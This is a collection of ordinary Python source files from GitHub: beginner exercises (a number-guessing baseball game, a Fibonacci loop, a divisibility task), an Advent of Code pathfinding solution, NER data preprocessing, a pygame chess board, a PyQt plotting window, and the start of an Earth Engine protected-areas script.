+{"seq_id":"12642419605","text":"# -*- coding: utf-8 -*-\n\nimport random\n\n\ndef get_random_number():\n # Helper Function - 지우지 말 것\n # 100부터 999까지 수를 램덤하게 반환함\n return random.randrange(100, 1000)\n\n\ndef is_digit(user_input_number):\n # '''\n # Input:\n # - user_input_number : 문자열 값\n # Output:\n # - user_input_number가 정수로 변환 가능할 경우는 True,\n # 그렇지 않을 경우는 False\n # Examples:\n # >>> import baseball_game as bg\n # >>> bg.is_digit(\"551\")\n # True\n # >>> bg.is_digit(\"103943\")\n # True\n # >>> bg.is_digit(\"472\")\n # True\n # >>> bg.is_digit(\"1032.203\")\n # False\n # >>> bg.is_digit(\"abc\")\n # False\n # '''\n # ===Modify codes below=============\n # 조건에 따라 변환되어야 할 결과를 result 변수에 할당\n try:\n int(user_input_number)\n result = True\n except:\n result = False\n\n # ==================================\n return result\n\n\ndef is_between_100_and_999(user_input_number):\n # '''\n # Input:\n # - user_input_number : 문자열 값\n # 입력된 값은 숫자형태의 문자열 값임이 보장된다.\n # Output:\n # - user_input_number가 정수로 변환하여 100이상 1000미만일 경우 True,\n # 그렇지 않을 경우는 False\n # Examples:\n # >>> import baseball_game as bg\n # >>> bg.is_between_100_and_999(\"551\")\n # True\n # >>> bg.is_between_100_and_999(\"103943\")\n # False\n # >>> bg.is_between_100_and_999(\"472\")\n # True\n # >>> bg.is_between_100_and_999(\"0\")\n # False\n # '''\n # ===Modify codes below=============\n # 조건에 따라 변환되어야 할 결과를 result 변수에 할당\n result = int(user_input_number) >= 100 and int(user_input_number) <= 999\n\n # ==================================\n return result\n\n\ndef is_duplicated_number(three_digit):\n # '''\n # Input:\n # - three_digit : 문자열로 된 세자리 양의 정수 값\n # 문자열로 된 세자리 양의 정수값의 입력이 보장된다.\n # Output:\n # - three_digit 정수로 변환하였을 경우 중복되는 수가 있으면 True,\n # 그렇지 않을 경우는 False\n # ex) 117 - True, 123 - False, 103 - False, 113 - True\n # Examples:\n # >>> import baseball_game as bg\n # >>> bg.is_duplicated_number(\"551\")\n # True\n # >>> bg.is_duplicated_number(\"402\")\n # False\n # >>> bg.is_duplicated_number(\"472\")\n # False\n # >>> bg.is_duplicated_number(\"100\")\n # True\n # '''\n # ===Modify codes below=============\n # 조건에 따라 변환되어야 할 결과를 result 변수에 할당\n # Hint - Len과 Set을 써서 할 수 있음, 중복되는 값의 str 길이는 1 또는 2\n\n result = len(set(three_digit)) != 3\n # ==================================\n return result\n\n\ndef is_validated_number(user_input_number):\n # '''\n # Input:\n # - user_input_number : 문자열 값\n # Output:\n # - user_input_number 값이 아래 조건이면 True, 그렇지 않으면 False를 반환\n # 1) 숫자형 문자열이며, 2) 100이상 1000미만이며, 3) 중복되는 숫자가 없을 경우\n # Examples:\n # >>> import baseball_game as bg\n # >>> bg.is_validated_number(\"amvd\")\n # False\n # >>> bg.is_validated_number(\"402\")\n # True\n # >>> bg.is_validated_number(\"472\")\n # True\n # >>> bg.is_validated_number(\"100\")\n # False\n # >>> bg.is_validated_number(\"1000\")\n # False\n # '''\n # ===Modify codes below=============\n # 조건에 따라 변환되어야 할 결과를 result 변수에 할당\n\n result = is_digit(user_input_number) and is_between_100_and_999(\n user_input_number) and not is_duplicated_number(user_input_number)\n\n # ==================================\n return result\n\n\ndef get_not_duplicated_three_digit_number():\n # '''\n # Input:\n # - None : 입력값이 없음\n # Output:\n # - 중복되는 숫자가 없는 3자리 정수값을 램덤하게 생성하여 반환함\n # 정수값으로 문자열이 아님\n # Examples:\n # >>> import baseball_game as bg\n # >>> bg.get_not_duplicated_three_digit_number()\n # 125\n # >>> bg.get_not_duplicated_three_digit_number()\n # 634\n # >>> bg.get_not_duplicated_three_digit_number()\n # 583\n # >>> bg.get_not_duplicated_three_digit_number()\n # 381\n # '''\n # ===Modify codes below=============\n # 조건에 따라 변환되어야 할 결과를 result 변수에 할당\n # get_random_number() 함수를 사용하여 random number 생��\n result = 0\n random = \"\"\n while len(random) != 3:\n result = get_random_number()\n random = \"\".join(set(str(result)))\n\n # ==================================\n return result\n\n\ndef get_strikes_or_ball(user_input_number, random_number):\n # '''\n # Input:\n # - user_input_number : 문자열값으로 사용자가 입력하는 세자리 정수\n # - random_number : 문자열값으로 컴퓨터가 자동으로 생성된 숫자\n # Output:\n # - [strikes, ball] : 규칙에 따라 정수형 값인 strikes와 ball이 반환됨\n # 변환 규칙은 아래와 같음\n # - 사용자가 입력한 숫자와 컴퓨터가 생성한 숫자의\n # 한 숫자와 자릿수가 모두 일치하면 1 Strike\n # - 자릿수는 다르나 입력한 한 숫자가 존재하면 1 Ball\n # - 세자리 숫자를 정확히 입력하면 3 Strike\n # Examples:\n # >>> import baseball_game as bg\n # >>> bg.get_strikes_or_ball(\"123\", \"472\")\n # [0, 1]\n # >>> bg.get_strikes_or_ball(\"547\", \"472\")\n # [0, 2]\n # >>> bg.get_strikes_or_ball(\"247\", \"472\")\n # [0, 3]\n # >>> bg.get_strikes_or_ball(\"742\", \"472\")\n # [1, 2]\n # >>> bg.get_strikes_or_ball(\"472\", \"472\")\n # [3, 0]\n # '''\n # ===Modify codes below=============\n # 조건에 따라 변환되어야 할 결과를 result 변수에 할당\n user_input_number = [x for x in str(user_input_number)]\n random_number = [x for x in str(random_number)]\n strike = 0\n ball = 0\n\n for user_input_index, user_input in enumerate(user_input_number, start=1):\n for random_index, random in enumerate(random_number, start=1):\n if user_input == random and user_input_index == random_index:\n strike += 1\n break\n elif user_input == random and user_input_index != random_index:\n ball += 1\n break\n\n result = [strike, ball]\n # ==================================\n return result\n\n\ndef is_yes(one_more_input):\n # '''\n # Input:\n # - one_more_input : 문자열값으로 사용자가 입력하는 문자\n # Output:\n # - 입력한 값이 대소문자 구분없이 \"Y\" 또는 \"YES\"일 경우 True,\n # 그렇지 않을 경우 False를 반환함\n # Examples:\n # >>> import baseball_game as bg\n # >>> bg.is_yes(\"Y\")\n # True\n # >>> bg.is_yes(\"y\")\n # True\n # >>> bg.is_yes(\"Yes\")\n # True\n # >>> bg.is_yes(\"YES\")\n # True\n # >>> bg.is_yes(\"abc\")\n # False\n # >>> bg.is_yes(\"213\")\n # False\n # >>> bg.is_yes(\"4562\")\n # False\n # '''\n # ===Modify codes below=============\n # 조건에 따라 변환되어야 할 결과를 result 변수에 할당\n lowercased_input = one_more_input.lower()\n result = lowercased_input == \"y\" or lowercased_input == \"yes\"\n # ==================================\n return result\n\n\ndef is_no(one_more_input):\n # '''\n # Input:\n # - one_more_input : 문자열값으로 사용자가 입력하는 문자\n # Output:\n # - 입력한 값이 대소문자 구분없이 \"N\" 또는 \"NO\"일 경우 True,\n # 그렇지 않을 경우 False를 반환함\n # Examples:\n # >>> import baseball_game as bg\n # >>> bg.is_no(\"Y\")\n # False\n # >>> bg.is_no(\"b\")\n # False\n # >>> bg.is_no(\"n\")\n # True\n # >>> bg.is_no(\"NO\")\n # True\n # >>> bg.is_no(\"nO\")\n # True\n # >>> bg.is_no(\"1234\")\n # False\n # >>> bg.is_no(\"yes\")\n # False\n # '''\n # ===Modify codes below=============\n # 조건에 따라 변환되어야 할 결과를 result 변수에 할당\n\n lowercased_input = one_more_input.lower()\n result = lowercased_input == \"n\" or lowercased_input == \"no\"\n # ==================================\n return result\n\n\ndef main():\n print(\"Play Baseball\")\n exit = False\n user_input = 0\n\n while exit is False:\n random_number = str(get_not_duplicated_three_digit_number())\n print(\"Random Number is : \", random_number)\n isCorrect = False\n # ===Modify codes below=============\n while isCorrect is False:\n user_input = input('Input guess number : ')\n\n if user_input == \"0\":\n exit = True\n break\n\n if not is_validated_number(user_input):\n print(\"Wrong Input, Input again\")\n continue\n\n result = get_strikes_or_ball(user_input, random_number)\n strike = result[0]\n ball = result[1]\n print(\"Strikes : {0} , Balls : {1}\".format(strike, ball))\n\n if strike == 3:\n isCorrect = True\n while True:\n input_continue = input('You win, one more(Y/N) ?')\n if is_yes(input_continue):\n break\n elif is_no(input_continue):\n exit = True\n break\n else:\n print(\"Wrong Input, Input again\")\n # ==================================\n\n print(\"Thank you for using this program\")\n print(\"End of the Game\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"AutumnSky/Inflearn-start_python_for_datascience","sub_path":"lab_7/linux_mac/baseball_game.py","file_name":"baseball_game.py","file_ext":"py","file_size_in_byte":9967,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"40974642940","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Feb 21 20:06:03 2018\r\n\r\n@author: zabiulla.khan\r\n\"\"\"\r\n\r\n\"\"\"\r\nWrite a program which will find all such numbers which are divisible by 7 but are not a\r\nmultiple of 5, between 2000 and 3200 (both included). The numbers obtained should be\r\nprinted in a comma-separated sequence on a single line.\r\n\"\"\"\r\n\r\n# Create a list with a range between 2000 and 3200\r\nlist1 = list(range(2000,3200))\r\n\r\n# initialize the iterator to 0\r\ni=0\r\n\r\n'''create a new empty list to store all the numbers within range that \r\nare divisble by 7 and not multiples of 5'''\r\nlist2 = []\r\n\r\n# Loop all the items in initial defined list range\r\nfor i in list1:\r\n \r\n #identify all the numbers divisible by 7 within range defined above\r\n div7 = i%7\r\n \r\n # identify all numbers which are multiples of 5 within the range defined above\r\n mul5 = i%5\r\n \r\n # Check if numbers are divisble by 7 and are not multiples of 5\r\n if div7 == 0 and mul5 != 0:\r\n # store/append all the numbers identified divisble by 7 and not multiples of 5\r\n list2.append(str(i))\r\n#Include a comma seperator \r\nprint(','.join(list2))\r\n\r\n \r\n","repo_name":"zabiullakhangithub/Python_Session1_Assignment_1.2","sub_path":"Assignment 1.2.py","file_name":"Assignment 1.2.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12634309340","text":"from dataclasses import dataclass, field\nimport heapq\nfrom itertools import product\n\nfrom more_itertools import take\nimport numpy as np\n\n\n@dataclass(order=True)\nclass Coord:\n dist: int\n coord: tuple[int, int]=field(compare=False)\n max_size: tuple[int, int]=field(compare=False)\n\n def neighbors(self):\n return [\n (self.coord[0]+i, self.coord[1]+j)\n for i, j in [(1, 0), (0, 1), (-1, 0), (0, -1)]\n if 0 <= self.coord[0] + i < self.max_size[0]\n and 0 <= self.coord[1] + j < self.max_size[1]\n ]\n\n\ndef a(grid):\n return do_dijkstra_old(grid)\n\n\ndef b(grid):\n return do_dijkstra_old(extend_grid(grid))\n\n\ndef extend_grid(grid):\n assert grid.shape[0] == grid.shape[1] # assumes square grid\n addition = np.repeat(np.arange(5), repeats=grid.shape[0]).reshape(-1, 1)\n grid = np.tile(grid, (5, 5))\n grid += addition + addition.T\n where_wrap = grid >= 10\n grid[where_wrap] = (grid[where_wrap] + 1) % 10\n return grid\n\n\ndef do_dijkstra_old(grid):\n heap = []\n coord_grid = {}\n nrows, ncols = grid.shape\n for coord in product(range(nrows), range(ncols)):\n loc = Coord(np.inf, coord, max_size=grid.shape)\n heap.append(loc)\n coord_grid[coord] = loc\n\n goal = heap[-1].coord\n coord_grid[(0,0)].dist = 0\n cur = heapq.heappop(heap)\n visited = set()\n\n while heap:\n if cur.coord is None:\n cur = heapq.heappop(heap)\n continue\n for coord in cur.neighbors():\n if coord in visited:\n continue\n\n entry = coord_grid[coord]\n new_dist = grid[coord] + cur.dist\n if new_dist < entry.dist:\n new_entry = Coord(new_dist, entry.coord, max_size=entry.max_size)\n coord_grid[coord] = new_entry\n entry.coord = None\n heapq.heappush(heap, new_entry)\n\n visited.add(cur.coord)\n cur = heapq.heappop(heap)\n\n if coord_grid[goal].dist < cur.dist:\n break\n\n return coord_grid[goal].dist\n\n\ndef if_only_down_or_right(grid):\n total_risk_grid = np.copy(grid)\n rows, cols = grid.shape\n coords = product(range(rows-1, -1, -1), range(cols-1, -1, -1))\n take(1, coords) # omit bottom-right corner\n for i, j in coords:\n choices = []\n if i != rows-1:\n choices.append(total_risk_grid[i+1, j])\n if j != cols-1:\n choices.append(total_risk_grid[i, j+1])\n total_risk_grid[i,j] += min(choices)\n return total_risk_grid[0,0] - grid[0,0]\n\n\nif __name__ == '__main__':\n files = [\n 'input15-test1.txt',\n # 'input15-test2.txt',\n # 'input15-test3.txt',\n 'input15.txt',\n ]\n for filename in files:\n print(filename)\n with open(filename) as f:\n lines = f.read().splitlines() # multi-line file\n grid = np.array([list(map(int, line)) for line in lines])\n\n print(f'A: {a(grid)}')\n print(f'B: {b(grid)}')\n","repo_name":"sjvrijn/AdventofCode","sub_path":"Sander/2021/day15.py","file_name":"day15.py","file_ext":"py","file_size_in_byte":3009,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"17508484270","text":"import re\nfrom collections import defaultdict\n\nimport numpy as np\n\n\ndef iob_to_iob2(tags):\n\tprev = \"O\"\n\tfor i in range(len(tags)):\n\t\ttag = re.sub(r'^B-|^I-', '', tags[i])\n\t\tif tags[i].startswith(\"I-\") and not prev.endswith(\"-\"+tag):\n\t\t\ttags[i] = \"B-\"+tag\n\t\tprev = tags[i]\n\treturn tags\n\n\ndef read_data(file):\n\t''' reading data '''\n\twords = []\n\ttags = []\n\n\toutput = []\n\n\twith open(file, 'r') as data:\n\t\tfor line in data:\n\t\t\tif line.strip():\n\t\t\t\tvals = line.strip().split(\" \")\n\t\t\t\tif vals[0] != \"-DOCSTART-\":\n\t\t\t\t\twords.append(vals[0])\n\t\t\t\t\ttags.append(vals[-1])\n\t\t\telif len(words) > 0:\n\t\t\t\ttags = iob_to_iob2(tags)\n\t\t\t\toutput.append([(word, tag) for word, tag in zip(words, tags)])\n\t\t\t\twords = []\n\t\t\t\ttags = []\n\treturn output\n\ndef lst_to_array(words, tags, max_sent_len):\n\toutput = np.zeros((1, max_sent_len * 2 + 1), np.int32)\n\toutput[0, :len(words)] = words\n\toutput[0, max_sent_len:max_sent_len + len(tags)] = tags\n\toutput[0, -1] = len(words)\n\treturn output\n\ndef prepare_sent(vals, word_to_id, tag_to_id, max_sent_len):\n\twords = [word_to_id[word[0]] for word in vals]\n\ttags = [word[-1] for word in vals]\n\ttags_lst = []\n\n\tfor i in range(len(tags)):\n\n\t\tif tags[i] == \"O\":\n\t\t\ttags_lst.append(0)\n\t\t\tcontinue\n\n\t\ttag = re.sub(r'^B-|^I-', '', tags[i])\n\t\tif i != len(tags) - 1 and tags[i].startswith('B-') and not tags[i + 1].startswith('I-'):\n\t\t\ttags_lst.append(tag_to_id['U-' + tag])\n\t\telif i != len(tags) - 1 and tags[i].startswith('B-') and tags[i + 1].startswith('I-'):\n\t\t\ttags_lst.append(tag_to_id['B-' + tag])\n\t\telif i != len(tags) - 1 and tags[i].startswith('I-') and tags[i + 1].startswith('I-'):\n\t\t\ttags_lst.append(tag_to_id['I-' + tag])\n\t\telif i != len(tags) - 1 and tags[i].startswith('I-') and not tags[i + 1].startswith('I-'):\n\t\t\ttags_lst.append(tag_to_id['L-' + tag])\n\n\t\t# last index\n\t\telif i == len(tags) - 1 and tags[i].startswith('I-'):\n\t\t\ttags_lst.append(tag_to_id['L-' + tag])\n\t\telif i == len(tags) - 1 and tags[i].startswith('B-'):\n\t\t\ttags_lst.append(tag_to_id['U-' + tag])\n\n\ttags = tags_lst\n\n\treturn lst_to_array(words, tags, max_sent_len)\n\nif __name__ == \"__main__\":\n\t\n\tMAX_SENT_LEN = 124\n\n\ttrain = read_data(\"data/train.txt\")\n\ttest = read_data(\"data/test.txt\")\n\tvalid = read_data(\"data/valid.txt\")\n\n\tword2idx = {}\n\n\tfor dataset in [train, test, valid]:\n\t\tfor sentence in dataset:\n\t\t\tfor token, label in sentence:\n\t\t\t\tword2idx[token] = len(word2idx)\n\n\tlabel2idx = {'B-LOC': 4, 'B-MISC': 2, 'B-ORG': 3, 'B-PER': 1, 'I-LOC': 8, 'I-MISC': 6, 'I-ORG': 7, 'I-PER': 5,\n\t\t\t\t 'L-LOC': 12, 'L-MISC': 10, 'L-ORG': 11, 'L-PER': 9, 'O': 0, 'U-LOC': 16, 'U-MISC': 14, 'U-ORG': 15, 'U-PER': 13}\n\t\n\t\n\tdef get_char2idx(dataset):\n\t\ttemp = []\n\t\tfor sentence in dataset:\n\t\t\tfor word in sentence:\n\t\t\t\ttemp.append(word[0])\n\t\ttemp = set(''.join(temp))\n\t\treturn {k:v for v,k in enumerate(temp)}\n\t\n\tchar2idx = {}\n \n\tfor dataset in [train,test,valid]:\n\t\tchar2idx.update(get_char2idx(train))\n\n\tprint(char2idx,len(char2idx))\n\n\tdef prepare(dataset):\n\t\tfor i,sentence in enumerate(dataset):\n\t\t\tdataset[i] = prepare_sent(sentence, word2idx, label2idx, MAX_SENT_LEN)\n\t\treturn dataset\n\t\n\n\t# np.save(\"processed_data/train\",prepare(train))\n\t# np.save(\"processed_data/test\",prepare(test))\n\t# np.save(\"processed_data/valid\",prepare(valid))\n\t# np.save(\"processed_data/word2idx\",word2idx)\n\t# np.save(\"processed_data/tag2idx\",label2idx)","repo_name":"kamalkraj/Named-Entity-Recognition-with-Bidirectional-LSTM-CNNs-TensorFlow","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":3314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"69994466641","text":"import pygame\nimport os\n\n# Intialize the pygame\npygame.init()\n\n# create the screen\nscreen = pygame.display.set_mode((1200, 900))\n\n# Background\nbackground = pygame.image.load('tahta.jpg')\n\n# Icon Caption felan\npygame.display.set_caption(\"Chess\")\nicon = pygame.image.load('tahta.jpg')\npygame.display.set_icon(icon)\n\n# Set the size for the image\nDEFAULT_IMAGE_SIZE = (80, 80)\n\n\n# image of pieces\nw_piyonImg = pygame.image.load('./image/white-piyon.png')\nw_kaleImg = pygame.image.load('./image/white-kale.png')\nw_atImg = pygame.image.load('./image/white-at.png')\nw_filImg = pygame.image.load('./image/white-fil.png')\nw_vezirImg = pygame.image.load('./image/white-vezir.png')\nw_sahImg = pygame.image.load('./image/white-şah.png')\n\nb_piyonImg = pygame.image.load('./image/black-piyon.png')\nb_kaleImg = pygame.image.load('./image/black-kale.png')\nb_atImg = pygame.image.load('./image/black-at.png')\nb_filImg = pygame.image.load('./image/black-fil.png')\nb_vezirImg = pygame.image.load('./image/black-vezir.png')\nb_sahImg = pygame.image.load('./image/black-şah.png')\n\n# Scale the image to your needed size\nw_piyonImg = pygame.transform.scale(w_piyonImg, DEFAULT_IMAGE_SIZE)\nw_kaleImg = pygame.transform.scale(w_kaleImg , DEFAULT_IMAGE_SIZE)\nw_atImg = pygame.transform.scale(w_atImg , DEFAULT_IMAGE_SIZE)\nw_filImg = pygame.transform.scale(w_filImg , DEFAULT_IMAGE_SIZE)\nw_vezirImg = pygame.transform.scale(w_vezirImg, DEFAULT_IMAGE_SIZE)\nw_sahImg = pygame.transform.scale(w_sahImg , DEFAULT_IMAGE_SIZE)\n\nb_piyonImg = pygame.transform.scale(b_piyonImg, DEFAULT_IMAGE_SIZE)\nb_kaleImg = pygame.transform.scale(b_kaleImg , DEFAULT_IMAGE_SIZE)\nb_atImg = pygame.transform.scale(b_atImg , DEFAULT_IMAGE_SIZE)\nb_filImg = pygame.transform.scale(b_filImg , DEFAULT_IMAGE_SIZE)\nb_vezirImg = pygame.transform.scale(b_vezirImg, DEFAULT_IMAGE_SIZE)\nb_sahImg = pygame.transform.scale(b_sahImg , DEFAULT_IMAGE_SIZE)\n\n# starting positions(dictionary)\n\n# yerleşim_beyaz = {\"bp1\": [0, 1], \"bp2\": [1, 1], \"bp3\": [2, 1], \"bp4\": [3, 1], \"bp5\": [4, 1], \"bp6\": [5, 1], \"bp7\": [6, 1], \"bp8\": [7, 1], \"bk1\": [0, 0], \"ba1\": [1, 0], \"bf1\": [2, 0], \"bv\": [3, 0], \"bş\": [4, 0], \"bf2\": [5, 0], \"ba2\": [6, 0], \"bk2\": [7, 0],\n# \"wp1\": [0, 6], \"wp2\": [1, 6], \"wp3\": [2, 6], \"wp4\": [3, 6], \"wp5\": [4, 6], \"wp6\": [5, 6], \"wp7\": [6, 6], \"wp8\": [7, 6], \"wk1\": [0, 7], \"wa1\": [1, 7], \"wf1\": [2, 7], \"wv\": [3, 7], \"wş\": [4, 7], \"wf2\": [5, 7], \"wa2\": [6, 7], \"wk2\": [7, 7]}\n\nyerleşim_siyah = {\"wp1\": [0, 1], \"wp2\": [1, 1], \"wp3\": [2, 1], \"wp4\": [3, 1], \"wp5\": [4, 1], \"wp6\": [5, 1], \"wp7\": [6, 1], \"wp8\": [7, 1], \"wk1\": [0, 0], \"wa1\": [1, 0], \"wf1\": [2, 0], \"wv\": [3, 0], \"wş\": [4, 0], \"wf2\": [5, 0], \"wa2\": [6, 0], \"wk2\": [7, 0],\n \"bp1\": [0, 6], \"bp2\": [1, 6], \"bp3\": [2, 6], \"bp4\": [3, 6], \"bp5\": [4, 6], \"bp6\": [5, 6], \"bp7\": [6, 6], \"bp8\": [7, 6], \"bk1\": [0, 7], \"ba1\": [1, 7], \"bf1\": [2, 7], \"bv\": [3, 7], \"bş\": [4, 7], \"bf2\": [5, 7], \"ba2\": [6, 7], \"bk2\": [7, 7]}\n# mydict = {'george': 16, 'amber': 19}\n# print(list(mydict.keys())[list(mydict.values()).index(16)]) # Prints george\nclass tahta():\n def fill(self, order):\n for piece in list(order.keys()):\n # print(piece)\n if \"b\" in piece:\n if \"p\" in piece:\n screen.blit(b_piyonImg, (order[piece][0] * 93.75 + 75, order[piece][1] * 93.75 + 75))\n elif \"k\" in piece:\n screen.blit(b_kaleImg, (order[piece][0] * 93.75 + 75, order[piece][1] * 93.75 + 75))\n elif \"a\" in piece:\n screen.blit(b_atImg, (order[piece][0] * 93.75 + 75, order[piece][1] * 93.75 + 75))\n elif \"f\" in piece:\n screen.blit(b_filImg, (order[piece][0] * 93.75 + 75, order[piece][1] * 93.75 + 75))\n elif \"v\" in piece:\n screen.blit(b_vezirImg, (order[piece][0] * 93.75 + 75, order[piece][1] * 93.75 + 75))\n elif \"ş\" in piece:\n screen.blit(b_sahImg, (order[piece][0] * 93.75 + 75, order[piece][1] * 93.75 + 75))\n elif \"w\" in piece:\n if \"p\" in piece:\n screen.blit(w_piyonImg, (order[piece][0] * 93.75 + 75, order[piece][1] * 93.75 + 75))\n elif \"k\" in piece:\n screen.blit(w_kaleImg, (order[piece][0] * 93.75 + 75, order[piece][1] * 93.75 + 75))\n elif \"a\" in piece:\n screen.blit(w_atImg, (order[piece][0] * 93.75 + 75, order[piece][1] * 93.75 + 75))\n elif \"f\" in piece:\n screen.blit(w_filImg, (order[piece][0] * 93.75 + 75, order[piece][1] * 93.75 + 75))\n elif \"v\" in piece:\n screen.blit(w_vezirImg, (order[piece][0] * 93.75 + 75, order[piece][1] * 93.75 + 75))\n elif \"ş\" in piece:\n screen.blit(w_sahImg, (order[piece][0] * 93.75 + 75, order[piece][1] * 93.75 + 75))\n\n def change(self,order, location, destination):\n try:\n a = list(order.keys())[list(order.values()).index(location)]\n print(a)\n order[a] = destination\n print(order)\n return order\n except:\n print(location, destination)\n\n\n# Game Loop\nrunning = True\ntahta = tahta()\ntahta.fill(yerleşim_siyah)\nwhile running:\n\n # RGB = Red, Green, Blue\n screen.fill((0, 0, 0))\n # Background Image\n screen.blit(background, (0, 0))\n tahta.fill(yerleşim_siyah)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n\n # if keystroke is pressed check whether its right or left\n if event.type == pygame.MOUSEBUTTONDOWN and pygame.mouse.get_pressed(num_buttons=3)[0]:\n print(\"down\")\n print(pygame.mouse.get_pos())\n print(int((pygame.mouse.get_pos()[1] - 75) / 93.75))\n print(int((pygame.mouse.get_pos()[0] - 75) / 93.75))\n seçim = [int((pygame.mouse.get_pos()[0] - 75) / 93.75),int((pygame.mouse.get_pos()[1] - 75) / 93.75)]\n print(pygame.mouse.get_pressed(num_buttons=3))\n\n if event.type == pygame.MOUSEBUTTONUP:\n print(\"up\")\n print(seçim , [int((pygame.mouse.get_pos()[1] - 75) / 93.75), int((pygame.mouse.get_pos()[0] - 75) / 93.75)])\n yerleşim_siyah = tahta.change(yerleşim_siyah, seçim , [int((pygame.mouse.get_pos()[0] - 75) / 93.75), int((pygame.mouse.get_pos()[1] - 75) / 93.75)] )\n tahta.fill(yerleşim_siyah)\n # if event.type == pygame.mouse.get_pressed:\n # print(\"pressed\")\n\n pygame.display.update()\n","repo_name":"M-Talha-Demir/Chess","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":6663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8731729810","text":"# -*- coding: utf-8 -*-\nimport sys\nfrom PyQt5.QtWidgets import QApplication, QVBoxLayout, QMainWindow, QTableWidgetItem\nimport data_graph\n\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\nfrom matplotlib.backends.backend_qt5agg import NavigationToolbar2QT as NavigationToolbar\nimport matplotlib.pyplot as plt\n\n\nclass MainWindow(QMainWindow, data_graph.Ui_Form):\n def __init__(self):\n # Это здесь нужно для доступа к переменным, методам\n # и т.д. в файле design.py\n super().__init__()\n self.setupUi(self) # Это нужно для инициализации нашего дизайна\n self.type = \"slave\" # необходимо для проерки на вид вызова окна - главное/дочернее\n self.figure = plt.figure()\n self.canvas = FigureCanvas(self.figure)\n self.toolbar = NavigationToolbar(self.canvas, self)\n # data\n self.data = None\n self.pause = 0\n # set the layout\n layout = QVBoxLayout()\n layout.addWidget(self.toolbar)\n layout.addWidget(self.canvas)\n self.graphicsViews.setLayout(layout)\n #\n # self.restartButton.clicked.connect(self.plot)\n self.pauseButton.toggled.connect(self.pause_set_clr)\n\n def pause_set_clr(self, checked):\n if checked:\n self.pause = 1\n else:\n self.pause = 0\n\n def plot(self, data=None):\n if self.pause == 0:\n\n self.data = data\n name = []\n data_x = []\n data_y = []\n if self.data:\n for graph in self.data:\n name.append(graph[0])\n data_x.append(graph[1])\n data_y.append(graph[2])\n else:\n name = [\"Test\"]\n data_x = [[0, 1, 2, 3]]\n data_y = [[0, 1, 4, 9]]\n time = data_x[0]\n # отрисуем график\n # instead of ax.hold(False)\n self.figure.clear()\n # create an axis\n axes = self.figure.add_subplot(111)\n # plot data\n [axes.plot(data_x[i], data_y[i], line_type_from_index(i), label=name[i]) for i in range(len(name))]\n axes.set_title(\"Данные с АЦП\")\n axes.set_ylabel(\"АЦП, кв\")\n axes.set_xlabel(\"Время, с\")\n axes.grid()\n # refresh canvas\n self.canvas.draw()\n # заполним таблицу\n self.tableWidget.setRowCount(len(self.data) + 1)\n time_name_item = QTableWidgetItem(\"Время\")\n self.tableWidget.setItem(0, 1, time_name_item)\n time_item = QTableWidgetItem(\"NA\") # \"{:.3g}\".format(data_x[0][-1]))\n self.tableWidget.setItem(0, 2, time_item)\n for row in range(len(self.data)):\n for column in range(1, 3):\n if column == 1:\n table_item = QTableWidgetItem(name[row])\n elif column == 2:\n try:\n table_item = QTableWidgetItem(\"{:.3g}\".format(data_y[row][-1]))\n except IndexError:\n table_item = QTableWidgetItem(\"NA\")\n else:\n table_item = QTableWidgetItem(\"NA\")\n self.tableWidget.setItem(row, column, table_item)\n else:\n pass\n\n # Переопределение ме��ода closeEvent, для перехвата события закрытия окна\n def closeEvent(self, event):\n if self.type == \"master\":\n event.ignore()\n else:\n self.hide()\n\n\ndef line_type_from_index(n):\n color_line = [\"b\", \"r\", \"g\", \"c\", \"m\", \"y\", \"k\"]\n style_line = [\"-\", \"--\", \"-.\", \":\"]\n try:\n color = color_line[n % len(color_line)]\n style = style_line[n // len(color_line)]\n # print(n % len(color_line), n // len(color_line))\n return style + color\n except Exception:\n return \"-r\"\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n main = MainWindow()\n main.type = \"master\"\n main.show()\n sys.exit(app.exec_())\n","repo_name":"a-styuf/oai_dd_pk","sub_path":"data_graph_main.py","file_name":"data_graph_main.py","file_ext":"py","file_size_in_byte":4331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38417049957","text":"n=int(input(\"Enter the number of terms to be printed:\")) \na=sum=0\nb=count=1\nprint(\"Fibonacci Series: \",\" \")\nwhile(count <= n):\n print(sum,\" \")\n count += 1\n a = b\n b = sum\n sum = a + b\n","repo_name":"dhanush2006/Python-MyCaptain","sub_path":"looping-task-main/Create fibonacci_series.py","file_name":"Create fibonacci_series.py","file_ext":"py","file_size_in_byte":189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29717996225","text":"import os\nimport ee\n\nimport modules.image_prep as image_prep\nimport modules.area_stats as area_stats\nimport modules.WDPA_prep as WDPA_prep\n\nfrom datasets.template_images import template_image_1\n\nee.Initialize()\n\ndataset_id = 13\n\nwdpa_pnt = ee.FeatureCollection(\"WCMC/WDPA/current/points\");\n\nwdpa_poly = ee.FeatureCollection(\"WCMC/WDPA/current/polygons\");\n\n#apply filters and merge polygon with buffered points \nwdpa_filt = WDPA_prep.filterWDPA(wdpa_poly) ##.merge(WDPA_prep.filterWDPA(wdpa_pnt).filter(ee.Filter.gt('REP_AREA', 0)).map(WDPA_prep.bufferByArea));\n#turn into image (no crs etc set currently)\nwdpa_overlap = wdpa_filt.reduceToImage(['STATUS_YR'],'min'); #make into raster - remove mask if want 0s\n\n#make binary\nwdpa_binary = wdpa_overlap.lt(2070).unmask()\n\n\n#reproject based on gfc data (approx 30m res which should be easily)\ncrs_template = template_image_1.select(0).projection().crs().getInfo()\n\nwdpa_binary_reproj = 